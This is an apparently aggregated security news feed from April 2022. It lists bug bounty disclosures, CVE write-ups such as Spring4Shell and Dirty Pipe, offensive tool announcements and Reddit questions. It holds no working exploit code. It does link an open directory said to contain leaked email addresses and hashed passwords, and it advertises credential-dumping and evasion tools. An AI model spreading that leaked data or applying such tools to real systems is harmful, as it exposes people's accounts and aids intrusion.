    XSS on https:/// via parameter
    U.S. Dept Of Defense disclosed a bug submitted by homosec: https://hackerone.com/reports/1252059
    XSS on https:/// via parameter
    U.S. Dept Of Defense disclosed a bug submitted by homosec: https://hackerone.com/reports/1251868
    Open Akamai ARL XSS at
    U.S. Dept Of Defense disclosed a bug submitted by whoisbinit: https://hackerone.com/reports/1317031
    Bypassing CORS Misconfiguration Leads to Sensitive Exposure at https:///
    U.S. Dept Of Defense disclosed a bug submitted by whoisbinit: https://hackerone.com/reports/1092125
    XSS Reflected -
    U.S. Dept Of Defense disclosed a bug submitted by drauschkolb: https://hackerone.com/reports/1223575
    Uninstalling Rockstar Games Launcher for Windows (64-bit), then reinstalling keeps you logged in without authentication
    Rockstar Games disclosed a bug submitted by toxiqcitee: https://hackerone.com/reports/1278261 - Bounty: $250
  • Open

    A Detailed Guide on Cewl
    Hi, Pentesters! In this article, we are going to focus on the Kali Linux tool “Cewl” which will basically help you to create a wordlist. The post A Detailed Guide on Cewl appeared first on Hacking Articles.
  • Open

    Multiple vulnerabilities leading to account takeover in TikTok SMB subdomain.
    I'm here to tell you how I took over an account in TikTok. I submitted this bug to HackerOne and I got $1000 for this bug. Continue reading on Medium »
    SuperBots Bug Bounty is here! Win up to $25,000!
    Continue reading on Medium »
    DonPAPI — Dumping DPAPI Credz Remotely
    Dumping relevant information on compromised targets without AV detection. DPAPI dumping Continue reading on Medium »
    Personal Security Checklist
    A curated checklist of tips to protect your digital security and privacy Continue reading on Medium »
    Recon tool for bug bounty
    Layla is a python script that automatically performs recon on a given URL. It combines the outputs of other known tools into a single one. Continue reading on Medium »
    scarce-apache2-a-framework-for-bug-hunting-or-pentesting-targeting-websites-that-have-cve-2021-41773…
    This tool can scan websites with the CVE-2021-41773 vulnerability affecting the Apache2 web server; ScaRCE can also run to execute… Continue reading on Medium »
    Web-Hacking-Toolkit — A Multi-Platform Web Hacking Toolkit Docker Image With Graphical User…
    A multi-platform web hacking toolkit Docker image with Graphical User Interface (GUI) support. Installation Continue reading on Medium »
  • Open

    Hunting Secrets from Containers by Analysing Docker Images
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Looking for advice on my next SANS course.
    Company is buying... I'm in Incident Response (3 years). Passed my 508 last year and now I have the opportunity to take another course. I have been tossing around the idea of moving from IR to a different area like detection engineering, hunting/intel or attempting to move to a dedicated Purple Team full time. Would taking FOR578 be the best step forward as far as flexibility in career advancements go? Maybe something else? submitted by /u/SlowBoatToHades [link] [comments]
    Getting back on track after a long break
    Hi guys, I'm a cybersec engineer that had some kind of break from security (I learnt lots of web development for the last 6 months or so) and well I really got out of shape. Now, I would like to get back on track and I was looking for resources / advice on how to do this better if any of you want to share. I really appreciate the help! submitted by /u/GeologistLegitimate6 [link] [comments]
    Been studying for OSCP for 250+ hours and I'm starting to doubt its relevance to real pentesting. Looking for guidance
    Some background on me: I used to be a programmer (2.5 years). Quit my job to pursue my passion, offensive cyber security. OSCP seemed like a great option for someone who hates written exams like me and loved the brutal nature of a 24 hour skill based exam. Been documenting my noob to OSCP journey on youtube, week by week: https://youtube.com/playlist?list=PLSGxDsVUZ-zzB4DzUb4b2lfihBFgj53eU The OSCP exam is a network penetration testing exam, strictly. There is little to no web exploitation. I was having a talk with a friend of mine on a CTF team I joined and he mentioned that network penetration testing is less relevant than it was in the past. Now, the OSCP does cover active directory and basic buffer overflow, which seems nice to know for sure. However the initial foothold often relies on heavily out of date software (think: 2006) for which an RCE exploit is readily available on exploit-db. Having worked as a developer for a few years, yeah I can confirm everything we do is based on web apps. Everything. Especially with work from home, I mean sometimes in companies that utilize remote work heavily there is no "domain controller". Just a bunch of devs collaborating on github or bitbucket. I'd say I'm about 250 more hours away from being OSCP ready (half way there) and I think that time would be better served on hackthebox, hackerone, and doing CTFs with my team. Given what I know about the OSCP I don't believe these things will help much with passing the exam even though they would make me a better professional. It's really one or the other. TLDR: Penetration testers, security engineers, etc: how important is network penetration to your job functions? (AKA, how relevant is OSCP?) Thanks in advance for your guidance. submitted by /u/NSP781 [link] [comments]
    I feel like I am wasting my time.
    Hi, 24 [M]. Basically I was in computer engineering school 4 years ago. But it was shit, the exams were literally copy paste from past exams and people didn't study, they just memorised. I had anxiety during exams and could never think with a clear head, I was very depressed, and I failed 3 semesters straight with all F's. So I transferred to MIS school, business informatics. I took programming courses, basic networks, basic hardware, and an introduction to information security course. But I self studied many concepts in computer science like ML, web, game dev, and finally security. Right now I am doing an internship as technical support, I am learning about Sophos firewall and later will learn about Azure and cloud security. I am 'Script kiddie' on hackthebox but I am getting better, I consider m…
    GAQM CISP good next step?
    Hi everyone, going to do my Security+ soon, wondering if CISP from GAQM is a good next step after Sec+. Whenever I try to find info on it the search is overrun by CISSP, which is a more challenging certification. submitted by /u/Namibguy [link] [comments]
    Looking for cybersecurity or digital privacy ideas / topics for my undergraduate degree
    Hi, I'm in the planning phase of my bachelors degree in information technology. I want to write about either cybersecurity and / or digital privacy. I have two main ideas currently: To set up a / or several honeypot services (WordPress sites, E-commerce website and or incomplete web apps) and collect the data running through them from bots and hopefully unsuspecting bad actors. To create a browser add-on or web app to visualize, in 3D (webgl), the trackers that are currently tracking you on a website. Any comments on the above mentioned topics, or any other interesting topics regarding: cybersecurity, digital privacy, big brother society and / or cryptography would be highly appreciated. submitted by /u/krullmizter [link] [comments]
    Netskope - Accidental install on personal PC, What can be seen?
    I am a consultant and work with many companies. One incorrectly pegged me as an FTE and sent an urgent email to download Netskope to access their data. I downloaded it and opened it but didn't realize it actually installed anything. Got some text box that I thought was an error. Later that day I found out it was not necessary for me to have Netskope. Today, I tried to access a website blocked by the company's acceptable use policy and found out that Netskope was in fact installed and has been active for a couple of weeks. I uninstalled it and have been able to access all websites again. Questions: 1) What exactly can a tool like this see? I assume my web browsing history, which is whatever, but can it see what Google Analytics data or otherwise I accessed for my other clients? What if I didn't download anything? Can it see my Google Drive documents not related to the specific company email? Can it see all of my passwords? 2) Is it worthwhile to ask the client company to delete my data? 3) I uninstalled it, which stopped it from blocking my access to websites. Is this enough or should I hard reset my entire computer? submitted by /u/phillytrees [link] [comments]
  • Open

    SecWiki News 2022-04-07 Review
    Data compression in APT forensic analysis by ourren; The metaverse and national data security: challenges and trends in building an ecosystem-based governance system by ourren. For more of the latest articles, visit SecWiki
  • Open

    Mental Models
    This page contains my collection of mental models I use for decision-making, business, and life in general. Some models are more practical and, as such, can be applied to everyday situations. Others can be used for long-term decisions or to enjoy in a thought process. Keep in mind that one should never be stuck thinking with common frameworks like the ones provided here. You should use your judgment and adjust to your situations. It is also essential to understand that these mental models are meaningless unless you internalize them. Further reading and practice are required. Circle of competence Focus on what you know. Double down on your strengths, and do not obsess about your weaknesses. For example, Einstein might not be the best pick for a basketball team, but that does not mean he is …
  • Open

    Getting more information about IP hosted by AWS
    I am trying to prove that a phishing email that I received was sent from the IT department at my institution as a way to help people "learn" not to click on links from unknown senders. The email header traces back to an IP at AWS. I know very little about tools and resources to dig further into the real source of a message like this. Is it possible, and if so, can anyone suggest some tools that I should look in to? submitted by /u/sudomakemetacos [link] [comments]
  • Open

    Log Injection
    🔍 Introduction Log Injection occurs when user input is written into logs: an attacker can use it to forge log entries or insert malicious content into the log. 🗡 Offensive techniques Detect WhiteBox It is easy to identify when you can inspect the source code or the logs. If error logs include the user's input values, the vulnerability applies. Code level: check whether user input is present in the logging code of each language. Log level: actually trigger errors through web requests and check the logs that get recorded. Vulnerable code for each language is summarized in Vulncat, so please refer to that document.
  • Open

    Module-2 | OWASP ModSecurity Core Rule Set -Pentesting & Bypassing Cloud Web Application Firewall…
    No content preview
    Series of Network Fundamentals #5 (Ports & Protocols),to get started in Cyber Security.
    No content preview
  • Open

    Looking at file-upload WAF bypass from the dotnet source
    Author: Y4er Original link: https://y4er.com/post/fileupload-bypass-with-dotnet/ Preface After reading the 赛博 group's "Looking at file-upload WAF bypass from the commons-fileupload source", which mentioned at the end that dotnet has the same problem, I looked at the dotnet source. Environment public ActionResult Index() { if (Request.Files....
    CVE-2022-22947 SpringCloud GateWay SPEL RCE Echo Response
    Author: Y4er Original link: https://y4er.com/post/cve-2022-22947-springcloud-gateway-spel-rce-echo-response/ Environment git clone https://github.com/spring-cloud/spring-cloud-gateway cd spring-cloud-gateway git checkout ...
  • Open

    Spring Framework RCE (CVE-2022-22965) NMAP (NSE) Checker (Non-Intrusive)
    Article URL: https://github.com/alt3kx/CVE-2022-22965 Comments URL: https://news.ycombinator.com/item?id=30941327 Points: 1 # Comments: 0

  • Open

    FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7
    submitted by /u/dmchell [link] [comments]
  • Open

    Ok so how do I know for sure if my iPhone is hacked?
    Any suggestions? submitted by /u/Unlucky_Cut_2534 [link] [comments]
    Easy and basic tls mitm proxy?
    I wish to look into some application traffic that is transported over tls, I found this proxy https://docs.mitmproxy.org/stable/concepts-howmitmproxyworks/ Do any of you have experience with this or other solutions you would recommend? submitted by /u/koera [link] [comments]
    Subdomain MX records
    Are there any security implications to consider when adding an mx record to a subdomain that points to a trusted 3rd party vendor? submitted by /u/mtx4gk [link] [comments]
    Pen Testing
    Who from IT Security would be tasked with sourcing a vendor for pen testing? What would be their job title? submitted by /u/bluesail1021 [link] [comments]
    Podcast idea
    I was thinking about a way to spend my extra time and I thought of an idea of starting a podcast to interview cyber professionals about how they got into cyber and hear their stories. I've never podcasted before but I imagine it would be casual conversation with some standard questions strictly focused on their careers. I don't know if anything like this is already out there but I could see this serving a need because I constantly see people posting things like "how do I get into cyber" etc. I was thinking about having diversity in people and jobs where you have your traditional technical jobs but also pivot into the non-technical roles like GRC, sales, project MGMT, etc that still have a need in the field. I guess I'm looking for some feedback... on a surface level, would this be something of interest for you? submitted by /u/gnomeparadox [link] [comments]
  • Open

    Ukraine — Situation update as of April 7
    The last 24 hours Continue reading on Medium »
    The Academy of the Ministry of Internal Affairs of Russia will prepare manuals for the fight…
    “Based on an application from the Investigation Department of the Ministry of Internal Affairs of Russia, we are developing methodological… Continue reading on Medium »
    War in Ukraine / April 5
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    How to set the approximate location of a person using the Yandex search engine?
    It’s no secret that search engines collect information about their users. But this allows us to determine the location of your target by… Continue reading on Medium »
    Ukraine — Situation update as of April 6
    The last 24 hours Continue reading on Medium »
  • Open

    Hacker Interview #2: Alvin “Steiner254”
    Learning cybersecurity comes in many forms: technical practice, lab workshops, and also writeups. Bug bounty hunter Alvin, going by the… Continue reading on HackenProof »
    What is SQL Injection?
    What is It? Continue reading on Medium »
    How I got access to 1600k users' PII data $$$$
    Hello Guys 👋 I am Gokul, Python developer, cyber security researcher, part-time bug hunter and open source tool maker, studying 3rd year… Continue reading on Medium »
    [NEW EVENT] BUG HUNTING BOUNTY IN STMAN TESTNET
    Dear Stickmen, you must be all very excited to experience the Testnet version to be released today. To celebrate this event and create the… Continue reading on Medium »
    Top 5 Geeky Websites 2022
    Hi everyone, hope you doing great. So today I’ll introduce you to five amazing websites which can be very helpful for everyone and I… Continue reading on Medium »
    Watch out the links : Account takeover
    This is my second writeup here :), hope you enjoy it too! Continue reading on Medium »
  • Open

    Ghostwriter v2.3.0 & 2022 Road Map
    Ghostwriter is changing! We have a new release candidate and a GraphQL API open for feedback. Continue reading on Posts By SpecterOps Team Members »
  • Open

    SecWiki News 2022-04-06 Review
    Analysis of the Netgear R8300 stack overflow vulnerability by chamd5; Security analysis of the drone MAVLINK protocol by chamd5; MITRE ATT&CK fourth-round evaluation results released by Avenger. For more of the latest articles, visit SecWiki
  • Open

    Validate AWS CloudFormation templates for security misconfigurations and vulnerabilities (online tool)
    submitted by /u/elitistAlmond [link] [comments]
    Dirty Pipe Explained - CVE-2022-0847
    submitted by /u/freakwin [link] [comments]
    RedFat: A Binary Hardening System for Linux/ELF/x64
    submitted by /u/zoomT [link] [comments]
  • Open

    Burp Scanner can now crawl static sites between 6x - 9x faster
    Burp Suite Professional version 2022.2.3 made Burp Scanner's crawler between 6x - 9x faster when used against static or stateless sites. This helps you to carry out automated reconnaissance much faste
  • Open

    FreeBuf Morning Report | Twitter restricts Russian government accounts; Intel shuts down all operations in Russia
    Twitter restricted content from more than 300 official Russian government accounts, including that of Russian President Putin.
    Ukraine's CERT-UA warns that the Russia-linked Armageddon APT group is attacking Ukrainian state agencies
    Ukraine's CERT-UA emergency response team recently released a security report warning domestic organizations to be on guard against the Russia-linked cyber-espionage group Armageddon APT.
    Gartner: six steps to building a cloud strategy
    In 2022, enterprises' innovative technologies keep emerging, and they will inevitably use new technologies to optimize their cloud deployments.
    [In-depth] Spring remote command execution vulnerability (CVE-2022-22965): principle analysis and thoughts
    This article reproduces and analyzes the vulnerability, in the hope of helping those who need it to research it further.
    New information-stealing trojan BlackGuard appears on Russian-language hacker forums, priced at $200 per month
    Researchers found BlackGuard being offered as malware-as-a-service on hacker forums.
    Multiple APT groups stirring in the Russia-Ukraine conflict
    A month ago the Russia-Ukraine conflict shook the world, and APT groups around the globe launched attacks using related topics as lures.
    Germany shuts down Hydra, the world's largest darknet market
    Germany shut down Hydra, the world's largest darknet market, and seized $25 million.
    Retailer The Works forced to close stores after cyber attack
    Leading UK high-street retailer The Works was forced to close some of its stores and suspend part of its operations after a cyber attack.
    Microsoft detects Spring4Shell attacks in its cloud services
    Microsoft said that since the vulnerability emerged it has observed ongoing attacks exploiting the Spring Cloud and Spring Core vulnerabilities in its cloud services.
  • Open

    Windows Persistence: COM Hijacking (MITRE: T1546.015)
    Introduction According to MITRE, “Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking The post Windows Persistence: COM Hijacking (MITRE: T1546.015) appeared first on Hacking Articles.
  • Open

    OSINT Dojo: Sakura
    No content preview
    picoCTF 2022- Writeup
    No content preview
  • Open

    Spring remote command execution vulnerability (CVE-2022-22965): principle analysis and thoughts
    Author: 麦兜 This article is a reader contribution; Seebug Paper looks forward to your submissions, and every accepted article receives a gift! Submission email: paper@seebug.org Preface Last week an RCE vulnerability in the Spring framework was exposed online. After circulating in the wild for a short while, Spring officially published the vulnerability details on March 31, and it was assigned CVE-2022-22965. This article reproduces and analyzes the vulnerability, in the hope of helping those who need it to research it further. 1. Prerequisite knowledge 1....
    Analysis of a sandbox escape vulnerability in Chrome's Mojo component
    Author: 天玄安全实验室 Original link: https://mp.weixin.qq.com/s/tGwCwOQ8eAwm26fHXTCy5A Vulnerability description Issue-1062091 is a UAF vulnerability in Chrome, located in Chromium's Mojo framework; exploiting it can lead to a sandbox escape in Chrome and Chromium-based browsers. The vulnerability was introduced in a commit in Chrome 81.0.4041.0. A few weeks later, ...
  • Open

    Attacker shall receive order updates on whatsapp for users who have activated whatsapp notification
    Zomato disclosed a bug submitted by schutzx0r: https://hackerone.com/reports/1523584 - Bounty: $300
  • Open

    Anyone got an extra sans GCFA practice test?
    PM me. Much appreciated submitted by /u/CrazyKitty2016 [link] [comments]

  • Open

    Telegram OSINT: Generating a data ‘backbone’ for investigation
    With Telegram growing ever more popular, vast amounts of data are being generated which we can use to map trends and fuel investigations… Continue reading on Medium »
    How to find open databases using ElasticSearch
    What we can do with shodan Continue reading on Medium »
    OSINT Dojo: Sakura
    In this article, I learn how to use Open Source Intelligence (OSINT) techniques to identify a number of identifiers and other pieces of… Continue reading on InfoSec Write-ups »
    War in Ukraine / April 4
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Tools for internet anonymity and in case of internet blockage (Part 2).
    VPN for mobile devices: Continue reading on Medium »
    Bigdata analysis and eDiscovery
    ICIJ Datashare — an eDiscovery tool that allows you to quickly and easily index and search multiple documents. And, according to the user… Continue reading on Medium »
    Deep web OSINT
    OSINT (Open Source Intelligence) is widely used in our community..and mostly free. Continue reading on Medium »
    TryHackMe: Subdomain Enumeration Writeup
    This room aims to teach the various ways of discovering subdomains to expand your attack surface of a target. We will learn about 3… Continue reading on Medium »
  • Open

    /r/netsec's Q2 2022 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your company's website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]
    CVE-2022-25372: Local Privilege Escalation in Pritunl VPN Client
    submitted by /u/hackers_and_builders [link] [comments]
    House of Heap Exploitation Dojo — CanSecWest 2022 Registration
    submitted by /u/mdulin2 [link] [comments]
    Wordle for CVEs!
    submitted by /u/benzies [link] [comments]
    Kepler: open source CVE Search Engine written in Rust
    submitted by /u/bndt00 [link] [comments]
    Shielder - A Sneak Peek into Smart Contracts Reversing and Emulation
    submitted by /u/smaury [link] [comments]
    CVE Markdown Charts - Your InfoSec reports will now write themselves...
    submitted by /u/onlinereadme [link] [comments]
    Researchers Uncover New Android Spyware With C2 Server Linked to Turla Hackers. Interestingly, the app establishes contact with a remote command-and-control server, 82.146.35[.]240, which has been previously identified as infrastructure belonging to the Russia-based hacking group known as Turla.
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    An OD with all the photos of r/place
    The OD contains snapshots taken roughly every 30 seconds. https://rplace.space/combined/1649112455.png is the last photo before white became the only option. https://rplace.space/combined/ submitted by /u/PhlegethonAcheron [link] [comments]
    Screenshots of r/place. Taken every 30 seconds.
    submitted by /u/bigfootsocks [link] [comments]
    Can someone help me identify what I'm looking at? I'm afraid I've found something.
    Hello - honestly not sure what I'm looking at and found this oddly niche sub after my post was removed on NoStupidQuestions. I seem to have found some sort of directory with tons of files - some seeming to contain txt files called "indian embassy" or "xbox live leak" These files contain email addresses, and a hashed password as well as some other pieces of info. Am I looking at something harmless or have I found something nefarious? Here is a link to the directory. Please open a text file and tell me if I need to report to authorities or something? http://mirrors.xieke.org/Sec/ submitted by /u/Dgb_iii [link] [comments]
    Anyone know of an app or anything to more easily browse ODs on mobile? I'm constantly tapping to zoom in and browse; it's a bit maddening. TIA!
    submitted by /u/platynom [link] [comments]
  • Open

    House of Heap Exploitation Training - CanSecWest 2022
    Heap exploitation serves as a huge wall on the binary exploitation journey. As a result, we have created a training for breaking through this wall. This training has been taught at DEFCON, ToorCon and to several private companies in the past. In this two day training, we will go over how the glibc malloc allocator works, a variety of heap specific vulnerability classes and demonstrate how to pwn the heap in a myriad of ways, including the breaking of the allocator itself and living off the land with the program being targeted. To end the training, there is a HTTP server with realistic vulnerabilities. In the final section, we will create a full exploit chain with an info leak to break ASLR/PIE and get code execution with a separate use after free. This section includes hands-on exploit development with people helping you with the complex process of heap grooming, planning and exploiting. Feel free to reach out if you have any questions. Link to the training: https://www.register.cansecwest.com/csw22/heapexploitdojo submitted by /u/mdulin2 [link] [comments]
  • Open

    DISTRIBUTED VERIFICATION OF SSL CERTIFICATES
    Continue reading on Medium »
    Komodo Consulting — Best Black Box Pen Testing, Penetration Testing Service Provider
    Studies reveal that many web applications have medium- and high-risk security flaws. Also, it is easy to identify and exploit the… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-05 Review
    No news updated yet today. For more recent articles, visit SecWiki
  • Open

    Process Injection via Component Object Model (COM) IRundown::DoCallback() @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    Burp Suite Enterprise Edition Kubernetes deployment and auto-scaling
    Burp Suite Enterprise Edition is the dynamic vulnerability scanner that can help you to secure your whole web portfolio. And with release 2022.3, we've taken those same flexible Burp scans and made th
  • Open

    Threat Modeling
    🚧 There are many parts I am still studying myself, so there may be mistakes or odd parts. Please do not take this post as authoritative, and if you find anything wrong I would really appreciate it if you let me know in the comments :D 🔍 Introduction Threat modeling identifies threats and mitigations in order to protect something valuable, and presents them in an easily understandable way. It is a methodology that structures and represents all information that can affect the security of an application, system, service, etc., and identifies security problems based on it. I plan to organize it roughly along the following flow.
    Spring4Shell RCE 취약점 (CVE-2022-22965)
    Last week the internet nearly caught fire again because of the Spring4Shell vulnerability. Fortunately it passed fairly quietly, since it is harder to reproduce than Log4Shell. A bit late, but I thought I would write up the issue while I am at it. Spring4Shell is a vulnerability that allows RCE (Remote Code Execution) in Spring Core on JDK 9 and later. It was a 0-day at the time of disclosure; CVE-2022-22965 was assigned and a patch released afterwards. There was a lot of debate about whether it was a big deal or not, but in the end it received a CVSS of 9.8. The problem: when Spring MVC or Spring WebFlux is running on JDK 9+ and a data binder is enabled on an endpoint, attacker-chosen logic is executed while the attack code contained in the request is being bound.
  • Open

    Making SMB Accessible with NTLMquic
    This week, I dusted off my reading list and saw that I’d previously bookmarked an interesting article about the introduction of SMB over QUIC. The article from Microsoft showed that Windows was including support for SMB to be used over the QUIC protocol, which should immediately spark interest for anyone who includes SMB attacks as... The post Making SMB Accessible with NTLMquic appeared first on TrustedSec.
  • Open

    Career changer. Any advice?
    Hi all - I have 3.5 years of a BS in Biology I couldn't graduate from because I had to take care of some medical affairs. I worked in medicine in many clinical roles for 7 or 8 years. So much BS in the health field had me running the other way. I found a job in tech sales, selling Tanium's cyber solution for almost a year. Then moved on to medical sales and have been doing that for almost 2 years now. I want to go back into cyber somehow, and am studying for Sec+. People tell me CCNA is the next most helpful cert to pick up for a job. Any advice for me in terms of job hunting? I am scared shitless I'll spend all this time getting certifications that nobody cares about. submitted by /u/verdite [link] [comments]
    Significance of image and original filename?
    I am currently playing around with Sysmon on Windows, and can't really wrap my head around the significance of the "Image" and "OriginalFileName" fields. From what I understand, the image is a read-only copy of the executable at the time it is run (say, C:\Windows\System32\cmd.exe). The original file name is part of the PE header (and thus, if signed, it is protected by the signature). Say an attacker sends you cmd.exe and renames it to outlook.exe; the original file name will still be cmd.exe - the attacker cannot change this without invalidating Microsoft's signature. My question is, from a defender's perspective, should a mismatch between image and original file name always be an immediate red flag, or are there legit use cases where the two can differ? submitted by /u/usair903 [link] [comments]
  • Open

    Zyxel patches critical vulnerability that can allow Firewall and VPN hijacks
    Article URL: https://arstechnica.com/information-technology/2022/04/zyxel-patches-critical-vulnerability-that-can-allow-firewall-and-vpn-hijacks/ Comments URL: https://news.ycombinator.com/item?id=30918099 Points: 2 # Comments: 0
    macOS SUHelper Root Privilege Escalation Vulnerability: CVE-2022-22639
    Article URL: https://www.trendmicro.com/en_us/research/22/d/macos-suhelper-root-privilege-escalation-vulnerability-a-deep-di.html Comments URL: https://news.ycombinator.com/item?id=30915803 Points: 2 # Comments: 0
  • Open

    DirtyPipe for Android
    Dirty Pipe (CVE-2022-0847) temporary root PoC for Android. Dirty Pipe root exploit for Android (Pixel 6) Targets Continue reading on Medium »
    Bug Bounty: How to get private invites
    Now I know that a lot of people will not like this answer and you certainly do not have to follow this method if you don’t wish to. Continue reading on Medium »
    CVE-2022-21907
    CVE-2022-21907: detection, protection, exploitation and demonstration. Exploitation: PowerShell, Python, Ruby, Nmap and Metasploit… Continue reading on Medium »
    Spoof as another Facebook user to report an impostor account
    When I was helping someone take down a poser/impostor account. I tried to check the request body on what’s going on behind the scene. The… Continue reading on Medium »
  • Open

    Pyramid Of Pain
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    FreeBuf Morning Report | Some online memorial ("cloud tomb-sweeping") apps suspected of infringing privacy; US State Department establishes Bureau of Cyberspace and Digital Policy
    On April 4 local time, the US State Department announced the establishment of its first Bureau of Cyberspace and Digital Policy (CDP), which emphasizes digital modernization in the federal domain.
  • Open

    SQL Injection at https://files.palantir.com/ due to CVE-2021-38159
    Palantir Public disclosed a bug submitted by haxor31337: https://hackerone.com/reports/1525200 - Bounty: $5000
    Private invitation links/tokens leak to third-party analytics site
    HackerOne disclosed a bug submitted by bigbug: https://hackerone.com/reports/1491127 - Bounty: $500
  • Open

    MacBook Pro M1 2021 with FileVault enabled, how long would it take to bruteforce the password?
    How long would it take to bruteforce an 18-character-long password with numbers, caps and symbols, on a MacBook Pro that has FileVault enabled? submitted by /u/huffilyvest28 [link] [comments]
  • Open

    Using Open Sources (OSINT) to locate the videos from Bucha, Ukraine
    In recent days we have followed the news about the massacre carried out by the Russians in Bucha, Ukraine. The newspapers reported that the… Continue reading on Medium »
    Ukraine — Situation update as of April 5
    The last 24 hours Continue reading on Medium »
  • Open

    What certifications would I need to get a job as a security analyst?
    I'm soon starting a job as a support engineer. So not IT. I want to move into a security analyst position. I'm open to other roles but I think this would be a good start. I'm thinking I'll get security+ first, but don't know where to go from there. I don't think I have the offensive security skills for OSCP quite yet. submitted by /u/Throwaway_deafgrape [link] [comments]
    Are hosted password managers safe?
    AFAIK all hosted password managers (Bitwarden, LastPass, Roboform, ...) are based on a master password. That master password you enter on their website. What is stopping these companies / password managers from snooping that password or actually being able to decrypt **all** your passwords that are saved on their servers? I'm not talking about e.g. KeePass and managing the password store yourself, or self-hosting Bitwarden. Maybe I am missing something, like local hashing of the master password, but am I mistaken that all hosted password managers suffer the same flaw? They could all have some method to decrypt my password stores because I just don't know what's happening on their servers? submitted by /u/moontear [link] [comments]
    Best resource today for learning reverse engineering?
    Hey you guys, I'm tasked with learning reverse engineering, and I'm wondering what's the best, relevant and up-to-date resource for doing this. I should mention I am already familiar with assembly and have read Practical Malware Analysis in the past, so I have the fundamentals. I also watched a few related courses on Pluralsight in the past few days, but I still feel like I am nowhere near proficient or knowledgeable enough to reverse binaries on my own. Suggestions? Thanks a lot! submitted by /u/Altiverses [link] [comments]
    Dynamic SSH for Multiple Remotes
    I'm configuring an architecture where a client workstation sends commands to a server within my LAN. That server, in turn, is responsible for communicating with many different base stations. The issue is the server-to-base station communication is unencrypted. Is a Dynamic SSH/SOCKS proxy server the answer to this? I envision a client sending commands to a known port on the server, the server forwarding the commands to the SOCKS proxy running locally, and the proxy transmitting the commands through an SSH tunnel to the requisite external IP:PORT combination. My gap in understanding is that the SOCKS proxy will need to communicate with several remote hosts. I'm just not sure if this is the right approach, or if the syntax supports this. These remote hosts all have SSH enabled, so this appears to be the most lightweight solution. submitted by /u/InfamousClyde [link] [comments]
    Apple's Vulnerability Patch
    I'm a student studying security! Apple says it has urgently released two zero-day patches that affect MacOS and iOS. These are likely to be abused and are said to allow threatened parties to interfere with or access kernel activities. Apple has released additional security updates for vulnerabilities and macOS failures affecting both macOS and iOS. Their discovery is said to have been made by anonymous researchers. MacOS and iOS AVD components allow applications to execute arbitrary code with kernel privileges. Does anyone know more about this? submitted by /u/zwrinerlucas [link] [comments]
    Moving from Web application pentesting to mobile.
    As I've become familiar with web app penetration testing, the company is now moving to mobile. What's the process like? Can you share some materials or methodologies which can be useful? I have zero experience with mobile app exploitation and absolutely no idea about how it should go. Thanks! submitted by /u/tryingtoworkatm [link] [comments]
  • Open

    WordPress Overtakes Magento in Credit Card Skimmers
    One of the most important monitoring tools in our security platform is our Sucuri SiteCheck scanner. It’s a free tool to scan your website for known malicious content and malware injections. The usage of SiteCheck also allows us to monitor trends in the website security landscape, and one of the things that it can spot are JavaScript-based credit card skimmers, often referred to in the security community as #MageCart infections. MageCart derives its name from the eCommerce CMS platform Magento, which we’ve written about extensively on this blog. Continue reading WordPress Overtakes Magento in Credit Card Skimmers at Sucuri Blog.
  • Open

    Countries’ vulnerability to food trade shocks from network-based simulations
    Article URL: https://www.nature.com/articles/s41598-022-08419-2 Comments URL: https://news.ycombinator.com/item?id=30910793 Points: 2 # Comments: 0
    Researchers uncover a hardware security vulnerability on Android phones
    Article URL: https://techxplore.com/news/2022-04-uncover-hardware-vulnerability-android.html Comments URL: https://news.ycombinator.com/item?id=30907952 Points: 1 # Comments: 0
  • Open

    a ton of general stuff
    https://download.tuxfamily.org/ submitted by /u/heywhatsyournam [link] [comments]
  • Open

    (SQLI) How I Hacked Hundreds of Students' Data on a Government Website
    Hola everybody, short story: when I was browsing a government website I found a search bar, and the first thing that came to my mind was "SQL INJECTION" Continue reading on Medium »
    Oda is launching our bug bounty program!
    We’re super proud to announce to the world that we are launching our official bug bounty program. While we always aim to establish the… Continue reading on Oda Product & Tech »
    My Pentest Log -13- (Bypass Renaming on File Upload)
    Greetings from the Hippodrome everyone, Continue reading on Medium »
    HACKED NOKIA WITH REFLECTED CROSS-SITE SCRIPTING VULNERABILITY….
    Hello, Hackers Welcome to my other write-up of Nokia Hacked with RXSS Vulnerability… Continue reading on Medium »
    2FA… To Bypass
    Learn various ways to bypass 2FA Continue reading on Medium »
  • Open

    SecWiki News 2022-04-04 Review
    Generate all call graph for Java Code by ourren; Detection and defense schemes for cryptomining by ourren; CDN and fingerprint concealment for Cobalt Strike by ourren; SecWiki Weekly (Issue 422) by ourren. For more recent articles, visit SecWiki
  • Open

    OAST (Out-of-band Application Security Testing)
    🔍 Introduction OAST stands for Out-of-band Application Security Testing and refers to a security testing method that uses OOB (Out-Of-Band) channels. OOB by itself does not constitute a security issue, but it is a highly useful analysis method for identifying blind-class vulnerabilities (Blind RCE, Blind XSS, Blind SSRF, etc.) or for detecting the exfiltration of sensitive information. OAST is also chosen as a main scan model in DAST (Dynamic Application Security Testing) tools such as ZAP and Burp, and this has a large effect on actual scan performance (higher detection rate). 🗡 Offensive techniques ZAP In ZAP, you can obtain an OAST domain and poll it through the OAST menu.
  • Open

    TruffleHog V3: Automatically validate over 600 API Keys
    submitted by /u/wifihack [link] [comments]
    Discovering Vulnerabilities in WordPress Plugins at Scale
    submitted by /u/jonas02 [link] [comments]
